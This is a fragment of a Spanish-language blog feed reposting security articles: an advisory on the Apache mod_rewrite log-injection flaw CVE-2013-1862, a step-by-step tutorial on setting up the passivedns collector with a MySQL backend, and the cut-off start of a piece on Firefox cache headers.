url="http://1.bp.blogspot.com/-BMzw9u7VhXM/UaiL5n3DpaI/AAAAAAAACk4/4J6oqQqdGAw/s72-c/TP-Link_TL-SC3130G-01.jpg" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4636869601854204167.post-7094898686769465503</guid><pubDate>Thu, 20 Jun 2013 15:22:00 +0000</pubDate><atom:updated>2013-06-20T10:22:59.763-05:00</atom:updated><title>Ejecución de comandos en Apache Web Server</title><description>&lt;a href="http://feedproxy.google.com/~r/hispasec/zCAd/~3/OlbUNSi5D_w/ejecucion-de-comandos-en-apache-web.html"&gt;Ejecución de comandos en Apache Web Server&lt;/a&gt;: &lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;a href="http://svn.apache.org/viewvc/httpd/httpd/branches/2.2.x/STATUS?view=markup&amp;amp;pathrev=1469311" style="font-size: 13pt;"&gt;Apache ha corregido un fallo de seguridad&lt;/a&gt;&lt;span style="font-size: 13pt;"&gt; que &lt;/span&gt;&lt;b style="font-size: 13pt;"&gt;podría permitir a un atacante ejecutar comandos&lt;/b&gt;&lt;span style="font-size: 13pt;"&gt; si los inyecta previamente en los logs (lo que se consigue simplemente realizando peticiones HTTP especialmente manipuladas).&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/-lQGOdsJwRC8/T8vqZ7LJC1I/AAAAAAAAAiI/AAPmmOuiVNY/s1600/Apache.png" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="87" src="http://4.bp.blogspot.com/-lQGOdsJwRC8/T8vqZ7LJC1I/AAAAAAAAAiI/AAPmmOuiVNY/s1600/Apache.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;b&gt;El fallo se encuentra en el módulo mod_rewrite&lt;/b&gt; del servidor web Apache, que no filtra ciertos caracteres y por tanto podría permitir la ejecución de código arbitrario de forma remota si un atacante deja comandos en los logs y luego son interpretados en consola.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;mod_rewrite es un módulo del servidor web Apache que permite reescribir las URL solicitadas sobre la marcha basándose en reglas. Dichas reglas de reescritura pueden ser invocadas desde los ficheros '&lt;i&gt;httpd.conf&lt;/i&gt;' de forma global o '&lt;i&gt;.htaccess&lt;/i&gt;' en cada directorio. mod_rewrite es ampliamente utilizado para crear direcciones URL alternativas para las páginas dinámicas de forma que resulten más legibles, fáciles de recordar por los usuarios, y también mejor indexadas por los motores de búsqueda o buscadores.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Joe Orton ha descubierto que la función '&lt;i&gt;do_rewritelog&lt;/i&gt;', localizada en el fichero '&lt;i&gt;modules/mappers/mod_rewrite.c&lt;/i&gt;', no filtra adecuadamente los caracteres no imprimibles cuando escribe los datos en el archivo de registro (logs). Si se usa la directiva RewriteLog, &lt;b&gt;un atacante remoto podría aprovechar este fallo para ejecutar comandos arbitrarios a través de peticiones HTTP especialmente manipuladas&lt;/b&gt;. Por ejemplo, que contengan una secuencia de escape para un terminal si los archivos de logs son mostrados.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/-AxmLebLi6VA/UadKNsegeFI/AAAAAAAACko/NK7hWboymyk/s1600/Apache_vuln_mod_rewrite.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="535" src="http://2.bp.blogspot.com/-AxmLebLi6VA/UadKNsegeFI/AAAAAAAACko/NK7hWboymyk/s1600/Apache_vuln_mod_rewrite.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;La vulnerabilidad, &lt;a href="http://people.apache.org/~jorton/mod_rewrite-CVE-2013-1862.patch"&gt;identificada como CVE-2013-1862&lt;/a&gt;, afecta a la versión del servidor Apache 2.2.24, aunque también podrían estar comprometidas versiones anteriores. &lt;b&gt;En la versión 2.2.25 ha sido corregida.&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;b&gt;Más información:&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;APACHE 2.2 STATUS&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;a href="http://svn.apache.org/viewvc/httpd/httpd/branches/2.2.x/STATUS?view=markup&amp;amp;pathrev=1469311"&gt;http://svn.apache.org/viewvc/httpd/httpd/branches/2.2.x/STATUS?view=markup&amp;amp;pathrev=1469311&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;mod_rewrite-CVE-2013-1862.patch&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;a href="http://people.apache.org/~jorton/mod_rewrite-CVE-2013-1862.patch"&gt;http://people.apache.org/~jorton/mod_rewrite-CVE-2013-1862.patch&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div align="right" style="text-align: right;"&gt;&lt;br /&gt;Juan José Ruiz&lt;/div&gt;&lt;br /&gt;&lt;div align="right" style="text-align: right;"&gt;&lt;br /&gt;&lt;a href="mailto:jruiz@hispasec.com"&gt;jruiz@hispasec.com&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;img height="1" src="http://feeds.feedburner.com/~r/hispasec/zCAd/~4/OlbUNSi5D_w" width="1" /&gt;&lt;div class="blogger-post-footer"&gt;@BIOHAZARD SIDE&lt;/div&gt;</description><link>http://ibiohazardi.blogspot.com/2013/06/ejecucion-de-comandos-en-apache-web.html</link><author>noreply@blogger.com (El Bio Gamer)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="http://4.bp.blogspot.com/-lQGOdsJwRC8/T8vqZ7LJC1I/AAAAAAAAAiI/AAPmmOuiVNY/s72-c/Apache.png" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4636869601854204167.post-8174411446713145589</guid><pubDate>Thu, 20 Jun 2013 15:22:00 +0000</pubDate><atom:updated>2013-06-20T10:22:54.760-05:00</atom:updated><title>Replicación pasiva de DNS (III)</title><description>&lt;a href="http://feedproxy.google.com/~r/SecurityArtWork/~3/-Q9cBcWNrZQ/"&gt;Replicación pasiva de DNS (III)&lt;/a&gt;: &lt;br /&gt;Vamos a seguir con nuestra serie sobre la Replicación Pasiva de DNS, abordando por fin la instalación de la sonda en nuestra red. En anteriores entradas dimos &lt;a href="http://www.securityartwork.es/2012/11/14/replicacion-pasiva-de-dns-introduccion/"&gt;una introducción al tema&lt;/a&gt; y hablamos de las posibles alternativas de &lt;a href="http://www.securityartwork.es/2013/05/02/replicacion-pasiva-de-dns-ii/"&gt;diseño de la infraestructura&lt;/a&gt;.&lt;br /&gt;&lt;strong&gt;El agente&lt;/strong&gt;&lt;br /&gt;Para hacer la labor de recolección de información hemos decidido utilizar el agente &lt;a href="https://github.com/gamelinux/passivedns"&gt;passivedns&lt;/a&gt; desarrollado por &lt;a href="https://github.com/gamelinux"&gt;Edward Bjarte Fjellskål&lt;/a&gt; (usuario de github y también conocido como &lt;a href="http://www.gamelinux.org/"&gt;gamelinux&lt;/a&gt;), que nos proporciona tanto la capacidad de captura de tráfico y extracción de información, como el paso de esa información a una base de datos.&lt;br /&gt;El agente es una pequeña aplicación en C que captura la información y la guarda en un fichero de texto. Para tratar la información podemos utilizar dos script en perl, proporcionados en el mismo paquete, con los que podemos enviar el contenido del fichero a una base de datos y realizar consultas sobre la misma.&lt;br /&gt;A continuación vamos a ver, someramente, los pasos a realizar para desplegar el agente en un entorno debian wheezy recién instalado:&lt;br /&gt;&lt;div&gt;&lt;br /&gt;1. Instalar prerequisitos&lt;br /&gt;&lt;div style="background-color: #fdfbdf; border: 1px solid #aaa; font-size: 10pt; margin: 0px; padding: 10px 35px 10px 35px;"&gt;&lt;br /&gt;&lt;pre&gt;# apt-get install git-core binutils-dev make libldns1 libldns-dev libpcap-dev&lt;br /&gt;libdate-simple-perl&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;2. Descargar árbol de la aplicación&lt;br /&gt;&lt;div style="background-color: #fdfbdf; border: 1px solid #aaa; font-size: 10pt; margin: 0px; padding: 10px 35px 10px 35px;"&gt;&lt;br /&gt;&lt;pre&gt;# cd /opt/&lt;br /&gt;# git clone git://github.com/gamelinux/passivedns.git&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;3. Compilar la aplicación&lt;br /&gt;&lt;div style="background-color: #fdfbdf; border: 1px solid #aaa; font-size: 10pt; margin: 0px; padding: 10px 35px 10px 35px;"&gt;&lt;br /&gt;&lt;pre&gt;# cd passivedns/src/&lt;br /&gt;# make&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Ahora podemos ejecutar la aplicación sin parámetros, y ésta empezará a capturar tráfico DNS hasta que nosotros la “matemos”:&lt;br /&gt;&lt;div style="background-color: #fdfbdf; border: 1px solid #aaa; font-size: 10pt; margin: 0px; padding: 10px 35px 10px 35px;"&gt;&lt;br /&gt;&lt;pre&gt;&lt;strong&gt;root@debian:/opt/passivedns/src# &lt;em&gt;./passivedns&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;[*] PassiveDNS 1.1.3&lt;br /&gt;[*] By Edward Bjarte Fjellskål &amp;lt;edward.fjellskaal@gmail.com&amp;gt;&lt;br /&gt;[*] Using libpcap version 1.3.0&lt;br /&gt;[*] Using ldns version 1.6.13&lt;br /&gt;[*] Device: eth0&lt;br /&gt;[*] Sniffing...&lt;br /&gt;&lt;br /&gt;^C&lt;br /&gt;&lt;br /&gt;-- Total DNS records allocated         :      110&lt;br /&gt;-- Total DNS assets allocated          :      227&lt;br /&gt;-- Total DNS packets over IPv4/TCP     :        0&lt;br /&gt;-- Total DNS packets over IPv6/TCP     :        0&lt;br /&gt;-- Total DNS packets over TCP decoded  :        0&lt;br /&gt;-- Total DNS packets over TCP failed   :        0&lt;br /&gt;-- Total DNS packets over IPv4/UDP     :      102&lt;br /&gt;-- Total DNS packets over IPv6/UDP     :        0&lt;br /&gt;-- Total DNS packets over UDP decoded  :      102&lt;br /&gt;-- Total DNS packets over UDP failed   :        0&lt;br /&gt;-- Total packets received from libpcap :      224&lt;br /&gt;-- Total Ethernet packets received     :      224&lt;br /&gt;-- Total VLAN packets received         :        0&lt;br /&gt;&lt;br /&gt;[*] passivedns ended.&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;strong&gt;Información recopilada&lt;/strong&gt;&lt;br /&gt;La información recopilada por la aplicación (por defecto está en &lt;tt&gt;/var/log/passivedns.log&lt;/tt&gt;) contiene, en este orden, los siguientes campos:&lt;br /&gt;&lt;ul&gt;&lt;br /&gt;&lt;li&gt;Marca de tiempo.&lt;/li&gt;&lt;br /&gt;&lt;li&gt;IP del cliente que realiza la consulta.&lt;/li&gt;&lt;br /&gt;&lt;li&gt;IP Servidor DNS.&lt;/li&gt;&lt;br /&gt;&lt;li&gt;Clase RR (Generalmente IN).&lt;/li&gt;&lt;br /&gt;&lt;li&gt;Consulta.&lt;/li&gt;&lt;br /&gt;&lt;li&gt;Tipo de consulta (A, AAAA, NS, CNAME, PTR, SOA, …).&lt;/li&gt;&lt;br /&gt;&lt;li&gt;Respuesta.&lt;/li&gt;&lt;br /&gt;&lt;li&gt;TTL.&lt;/li&gt;&lt;br /&gt;&lt;li&gt;Número de veces que se ha realizado la consulta antes de imprimirla en el log.&lt;/li&gt;&lt;br /&gt;&lt;/ul&gt;&lt;br /&gt;&lt;div style="background-color: #fdfbdf; border: 1px solid #aaa; font-size: 10pt; margin: 0px; padding: 10px 35px 10px 35px;"&gt;&lt;br /&gt;&lt;pre&gt;1369760113.965922||192.168.1.4||172.16.1.100||IN||www.securityartwork.es.&lt;br /&gt;    ||A||90.161.233.229||124||2&lt;br /&gt;1369760114.612187||192.168.1.4||172.16.1.100||IN||s.gravatar.com.&lt;br /&gt;    ||CNAME||cs91.wac.edgecastcdn.net.||4135||1&lt;br /&gt;1369760114.612187||192.168.1.4||172.16.1.100||IN||cs91.wac.edgecastcdn.net.&lt;br /&gt;    ||A||68.232.35.121||2151||1&lt;br /&gt;1369760114.612246||192.168.1.4||172.16.1.100||IN||platform.linkedin.com.&lt;br /&gt;    ||CNAME||wildcard.linkedin.com.edgekey.net.||67||1&lt;br /&gt;1369760114.612246||192.168.1.4||172.16.1.100||IN||wildcard.linkedin.com.edgekey.net.&lt;br /&gt;    ||CNAME||e5168.g.akamaiedge.net.||4838||1&lt;br /&gt;1369760114.612246||192.168.1.4||172.16.1.100||IN||e5168.g.akamaiedge.net.&lt;br /&gt;    ||A||2.22.224.239||8||1&lt;br /&gt;1369760114.612247||192.168.1.4||172.16.1.100||IN||twitter.com.&lt;br /&gt;    ||A||199.59.148.10||20||1&lt;br /&gt;1369760114.612247||192.168.1.4||172.16.1.100||IN||twitter.com.&lt;br /&gt;    ||A||199.59.150.39||20||1&lt;br /&gt;1369760114.612247||192.168.1.4||172.16.1.100||IN||twitter.com.&lt;br /&gt;    ||A||199.59.150.7||20||1&lt;br /&gt;1369760114.626190||192.168.1.4||172.16.1.100||IN||s0.wp.com.&lt;br /&gt;    ||CNAME||cs82.wac.edgecastcdn.net.||8631||1&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;strong&gt;Opciones relevantes&lt;/strong&gt;&lt;br /&gt;Si ejecutamos la aplicación junto con la opción -h, obtenemos la ayuda de la misma:&lt;br /&gt;&lt;div style="background-color: #fdfbdf; border: 1px solid #aaa; font-size: 10pt; margin: 0px; padding: 10px 35px 10px 35px;"&gt;&lt;br /&gt;&lt;pre&gt;&lt;strong&gt;root@debian:/opt/passivedns/src# ./passivedns -h&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;USAGE:&lt;br /&gt; $ passivedns [options]&lt;br /&gt;&lt;br /&gt; OPTIONS:&lt;br /&gt;&lt;br /&gt; -i &amp;lt;iface&amp;gt;   Network device &amp;lt;iface&amp;gt; (default: eth0).&lt;br /&gt; -r &amp;lt;file&amp;gt;    Read pcap &amp;lt;file&amp;gt;.&lt;br /&gt; -l &amp;lt;file&amp;gt;    Logfile normal queries (default: /var/log/passivedns.log).&lt;br /&gt; -L &amp;lt;file&amp;gt;    Logfile for SRC Error queries (default: /var/log/passivedns.log).&lt;br /&gt; -b 'BPF'     Berkley Packet Filter (default: 'port 53').&lt;br /&gt; -p &amp;lt;file&amp;gt;    Name of pid file (default: /var/run/passivedns.pid).&lt;br /&gt; -S &amp;lt;mem&amp;gt;     Soft memory limit in MB (default: 256).&lt;br /&gt; -C &amp;lt;sec&amp;gt;     Seconds to cache DNS objects in memory (default 43200).&lt;br /&gt; -P &amp;lt;sec&amp;gt;     Seconds between printing duplicate DNS info (default 86400).&lt;br /&gt; -X &amp;lt;flags&amp;gt;   Manually set DNS RR Types to care about(Default -X 46CDNPRS).&lt;br /&gt; -u &amp;lt;uid&amp;gt;     User ID to drop privileges to.&lt;br /&gt; -g &amp;lt;gid&amp;gt;     Group ID to drop privileges to.&lt;br /&gt; -T &amp;lt;dir&amp;gt;     Directory to chroot into.&lt;br /&gt; -D           Run as daemon.&lt;br /&gt; -V           Show version and exit.&lt;br /&gt; -h           This help message.&lt;br /&gt;&lt;br /&gt; FLAGS:&lt;br /&gt;&lt;br /&gt; * For Record Types:&lt;br /&gt;   4:A   6:AAAA  C:CNAME  D:DNAME  N:NAPTR  O:SOA&lt;br /&gt;   P:PTR R:RP S:SRV T:TXT M:MX  n:NS&lt;br /&gt;&lt;br /&gt; * For Server Return Code (SRC) Errors:&lt;br /&gt;   f:FORMERR   s:SERVFAIL  x:NXDOMAIN  o:NOTIMPL  r:REFUSED&lt;br /&gt;   y:YXDOMAIN  e:YXRRSET   t:NXRRSET   a:NOTAUTH  z:NOTZONE&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Además de las opciones comunes en muchos servicios Linux, encontramos varias opciones interesantes. &lt;br /&gt;La primera de ellas es &lt;strong&gt;-P &amp;lt;sec&amp;gt;&lt;/strong&gt;, que nos indica los segundos que se tarda en imprimir información duplicada al registro (entendiendo como información duplicada misma tupla consulta, tipo y respuesta). Aquí toma sentido el último campo que se guarda en el fichero de log, puesto que indica el número de veces que se ha realizado una determinada petición en el intervalo contenido entre el instante de la primera petición y &amp;lt;sec&amp;gt; segundos después, que es cuando se vuelve a guardar en el fichero de log.&lt;br /&gt;Otra opción interesante es &lt;strong&gt;-X &amp;lt;flags&amp;gt;&lt;/strong&gt;, que permite ajustar los registros y errores que queremos guardar. Aunque a priori puede ser suficiente con los que se ofrecen por defecto, puede resultar interesante tener información sobre los servidores de nombres (flag n: NS) o los servidores de correo (flag M: MX) que se han consultado. Por otra parte, también puede ser interesante obtener los errores de dominio no existente (flag x: NXDOMAIN), que, además, pueden guardarse a un fichero independiente, separado de las consultas correctas, utilizando la opción &lt;strong&gt;-L &amp;lt;file&amp;gt;&lt;/strong&gt;.&lt;br /&gt;&lt;strong&gt;Tratamiento de información&lt;/strong&gt;&lt;br /&gt;Como hemos comentado anteriormente, para tratar la información tenemos dos script en Perl, situados en la carpeta &lt;tt&gt;tools/&lt;/tt&gt; del paquete que hemos descargado. &lt;br /&gt;El fichero &lt;tt&gt;pdns2db.pl&lt;/tt&gt; permite pasar la información contenida en el fichero generado por la aplicación passivedns a una base de datos. &lt;br /&gt;Antes de ejecutarlo debemos asegurarnos que cumplimos los requisitos del script, por lo que ejecutaremos el siguiente comando:&lt;br /&gt;&lt;div style="background-color: #fdfbdf; border: 1px solid #aaa; font-size: 10pt; margin: 0px; padding: 10px 35px 10px 35px;"&gt;&lt;br /&gt;&lt;pre&gt;# aptitude install libdbd-mysql-perl libdbi-perl libdatetime-perl&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;También deberemos modificar el fichero con los datos de conexión a nuestra base de datos:&lt;br /&gt;&lt;div style="background-color: #fdfbdf; border: 1px solid #aaa; font-size: 10pt; margin: 0px; padding: 10px 35px 10px 35px;"&gt;&lt;br /&gt;&lt;pre&gt;our $DB_NAME    = "pdns";&lt;br /&gt;our $DB_HOST    = "127.0.0.1";&lt;br /&gt;our $DB_PORT    = "3306";&lt;br /&gt;our $DB_USERNAME   = "pdns";&lt;br /&gt;our $DB_PASSWORD   = "pdns";&lt;br /&gt;our $DBI        = "DBI:mysql:$DB_NAME:$DB_HOST:$DB_PORT";&lt;br /&gt;our $TABLE_NAME = "pdns";&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;El último paso de la configuración consiste en crear la nueva base de datos en el sistema (el propio script se encarga de crear las tablas necesarias para el correcto funcionamiento de la aplicación):&lt;br /&gt;&lt;div style="background-color: #fdfbdf; border: 1px solid #aaa; font-size: 10pt; margin: 0px; padding: 10px 35px 10px 35px;"&gt;&lt;br /&gt;&lt;pre&gt;mysql&amp;gt; GRANT USAGE ON *.* TO 'pdns'@'localhost' IDENTIFIED BY 'pdns';&lt;br /&gt;mysql&amp;gt; GRANT SELECT,CREATE,INSERT,UPDATE ON pdns.* TO 'pdns'@'localhost';&lt;br /&gt;mysql&amp;gt; flush privileges;&lt;br /&gt;mysql&amp;gt; CREATE DATABASE pdns;&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;A continuación, ejecutamos la herramienta, con la opción &lt;tt&gt;--daemon&lt;/tt&gt; para que se convierta en demonio y podamos seguir usando la consola para realizar alguna consulta con el otro script presente, llamado &lt;tt&gt;search-pdns.pl&lt;/tt&gt;:&lt;br /&gt;&lt;div style="background-color: #fdfbdf; border: 1px solid #aaa; font-size: 10pt; margin: 0px; padding: 10px 35px 10px 35px;"&gt;&lt;br /&gt;&lt;pre&gt;&lt;strong&gt;root@debian:/opt/passivedns/tools# perl pdns2db.pl --daemon&lt;/strong&gt;&lt;br /&gt;2013-05-28 20:53:45 [*] Starting pdns2db.pl&lt;br /&gt;2013-05-28 20:53:45 [*] Daemonizing...&lt;br /&gt;&lt;strong&gt;root@debian:/opt/passivedns/tools# perl search-pdns.pl -s securityartwork.es&lt;/strong&gt;&lt;br /&gt;                                         === PassiveDNS ===&lt;br /&gt;&lt;br /&gt;      FirstSeen      |      LastSeen       |  TYPE |   TTL  |      Query&lt;br /&gt;--------------------------------------------------------------------------------------&lt;br /&gt; 2013-05-22 20:35:13 | 2013-05-28 19:06:26 |   A   |   124  | www.securityartwork.es &lt;br /&gt;&lt;br /&gt;  |     Answer     |  Count&lt;br /&gt;------------------------------&lt;br /&gt;  | 90.161.233.229 |   36&lt;br /&gt;&lt;br /&gt;Displayed 1 (sql limit: 100)&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Para hacer más fácil la labor de consulta de información disponemos, en la carpeta &lt;tt&gt;www/&lt;/tt&gt; del paquete, un fichero &lt;tt&gt;index.php&lt;/tt&gt; que, configurado correctamente y situado en un servidor web, nos permite realizar consultas sencillas sobre la base de datos.&lt;br /&gt;En lo que a interfaces web respecta, también hemos encontrado la siguiente, llamada &lt;a href="https://github.com/phunold/pdns-ui"&gt;pdns-ui&lt;/a&gt;, interoperable con nuestra base de datos, más completa y con más opciones, pero también más compleja de instalar y configurar. Dejamos para el usuario, (o para una próxima entrega de la serie, quién sabe ;) ) la tarea de instalar esta otra interfaz.&lt;br /&gt;&lt;img height="1" src="http://feeds.feedburner.com/~r/SecurityArtWork/~4/-Q9cBcWNrZQ" width="1" /&gt;&lt;div class="blogger-post-footer"&gt;@BIOHAZARD SIDE&lt;/div&gt;</description><link>http://ibiohazardi.blogspot.com/2013/06/replicacion-pasiva-de-dns-iii.html</link><author>noreply@blogger.com (El Bio Gamer)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4636869601854204167.post-2759879184604536132</guid><pubDate>Thu, 20 Jun 2013 15:22:00 +0000</pubDate><atom:updated>2013-06-20T10:22:50.585-05:00</atom:updated><title>La memoria cache de Firefox: fallo o característica.</title><description>&lt;a href="http://feedproxy.google.com/~r/SecurityByDefault/~3/4t-kNzy3WfI/la-memoria-cache-de-firefox-fallo-o.html"&gt;La memoria cache de Firefox: fallo o característica.&lt;/a&gt;: &lt;br /&gt;&lt;div style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/--WhGyfN43ys/UaZL_W1ADPI/AAAAAAAAIT0/RmL45SUw078/s1600/ilustraciones-vectoriales-cronometro_18-4072.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="159" src="http://1.bp.blogspot.com/--WhGyfN43ys/UaZL_W1ADPI/AAAAAAAAIT0/RmL45SUw078/s200/ilustraciones-vectoriales-cronometro_18-4072.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Todo aquel que haya administrado un sitio web importante sabrá que gestionar el manejo de la caché de los navegadores para optimizar el rendimiento es un dolor de cabeza. Exactamente igual que ocurre con cualquier otra cosa en la que hay que pegarse con los navegadores más populares y las implantaciones que hace cada uno de ellos de un estándar. ¡Qué se yo! me viene a la cabeza el CSS o el javascript.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Pero hoy nos vamos a centrar en la caché, esas directrices mandadas desde el servidor, que muy concienzudamente un equipo de expertos arquitectos en calidad y rendimiento o simplemente administradores y desarrolladores con dos dedos de frente han decidido poner para aliviar la carga de recursos de la red.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Breve y resumidamente, existes dos tipos de cabeceras que un servidor web puede mandar: las que indican cuando expira un elemento y las que indican que método usar para comprobar la validez de ese elemento cacheado.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Históricamente cada familia de navegadores se ha comportado de forma distinta con las zonas grises del estándar (&lt;a href="http://www.w3.org/Protocols/rfc2616/rfc2616.html"&gt;rfc2616&lt;/a&gt;), por ejemplo, Firefox no cacheaba ningún contenido que se sirviese por SSL salvo se indicase con una cabecera específica de que era contenido público (Cache-Control: public), incluso indicando con otras cabeceras que se debía guardar. En cambio, Internet Explorer o Chrome, salvo se dijese lo contrario con una correcta configuración, cacheaban o no bajo su criterio.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;El ejemplo anterior podría ser una buena noticia si todos los navegadores hiciesen lo mismo: no almacenar el contenido servido por SSL si no tiene configuración de caché. Esto supondría que la web cargaría algo más lenta y que los servidores tendrían que servir repetidas veces contenidos estáticos. Algo poco realista con los números y cargas que manejan las webs de hoy en día.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Me pierdo, volviendo al tema de las cabeceras. Para indicar cuando el contenido se ha de renovar se usan dos cabeceras &lt;span style="font-family: Courier New,Courier,monospace;"&gt;Cache-Control: max-age&lt;/span&gt; o &lt;span style="font-family: Courier New,Courier,monospace;"&gt;Expires&amp;nbsp;&lt;/span&gt;(en ocasiones se ven ambas, pero son redundantes y solo debería ser una de ellas), y el tiempo en segundos en el que caduca el contenido o la fecha en la que se debe renovar. Para saber si un elemento cacheado sigue siendo válido, se usan otras dos cabeceras más, también redundantes entre ellas:&amp;nbsp;&lt;span style="font-family: Courier New,Courier,monospace;"&gt;Last-Modified&lt;/span&gt; o &lt;span style="font-family: Courier New,Courier,monospace;"&gt;ETag&lt;/span&gt; y al igual que en el caso anterior, solo se debe usar una de ellas. En el primero de los casos, con la fecha de la última vez que se modificó el elemento y en el segundo, con un identificador único del contenido.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Cuando hablamos de caché todo el mundo sobreentiende que nos referimos a la caché de disco, en memoria no volátil, pero esto no tiene por qué ser así. Todos los navegadores también usan caches en memoria para las páginas que se visitan en ese momento.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;En las últimas versiones del navegador Firefox es posible ver que elementos están cacheados tanto en disco, como en memoria, tan solo escribiendo en la dirección &lt;span style="font-family: Courier New,Courier,monospace;"&gt;&lt;b&gt;about:cache&lt;/b&gt;&lt;/span&gt;&lt;span style="font-family: inherit;"&gt;, esto creará una página con enlaces a los contenidos guardados.&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;span style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;table align="center" cellpadding="0" 